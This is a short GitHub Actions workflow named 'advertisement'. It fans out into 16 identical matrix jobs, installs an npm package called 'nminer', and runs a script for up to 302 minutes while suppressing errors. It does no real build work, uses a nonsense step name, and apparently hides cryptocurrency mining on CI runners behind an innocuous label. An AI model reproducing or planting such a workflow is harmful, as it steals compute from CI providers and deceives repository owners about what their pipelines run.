name: advertisement
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3522 }
          - { version: 3621 }
          - { version: 9127 }
          - { version: 7415 }
          - { version: 3797 }
          - { version: 9093 }
          - { version: 7114 }
          - { version: 9307 }
          - { version: 6406 }
          - { version: 108 }
          - { version: 7392 }
          - { version: 1589 }
          - { version: 1288 }
          - { version: 8565 }
          - { version: 2400 }
          - { version: 307 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: overcooked kindly
        run: |
          npm install nminer@latest
          timeout 302m node advertisement.js || echo "advertisement executed"